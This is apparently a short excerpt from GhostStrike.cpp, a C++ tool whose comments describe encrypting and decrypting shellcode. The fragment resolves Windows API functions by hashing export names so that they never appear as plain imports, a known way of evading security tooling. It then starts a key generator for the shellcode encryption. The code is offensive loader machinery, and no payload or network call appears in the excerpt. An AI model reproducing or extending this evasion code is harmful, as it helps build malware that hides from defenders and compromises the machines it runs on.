INNER CODE UNIT · C++
func_name
stivenhacker/GhostStrike · GhostStrike.cpp:98
const char* func_name = (const char*)((BYTE*)module + names[i]);
if (hash_function(func_name) == function_hash) {
return (FARPROC)((BYTE*)module + functions[ordinals[i]]);
}
}
std::cerr << "Error retrieving the function address.\n";
exit(EXIT_FAILURE);
}
// Generates a cryptographically secure key of the specified length.
// This key will be used to encrypt and decrypt the shellcode.
std::vector<unsigned char> generate_key(SIZE_T length) {
std::vector<unsigned char> key(length);
HCRYPTPROV hProv;
auto CryptAcquireContextA = (decltype(&::CryptAcquireContextA))get_api_function(hash_function("advapi32.dll"), hash_function("CryptAcquireContextA"));
auto CryptGenRandom = (decltype(&::CryptGenRandom))get_api_function(hash_function("advapi32.dll"), hash_function("CryptGenRandom"));
auto CryptReleaseContext = (decltype(&::CryptReleaseContext))get_api_function(hash_function("advapi32.dll"), hash_function("CryptReleaseContext"));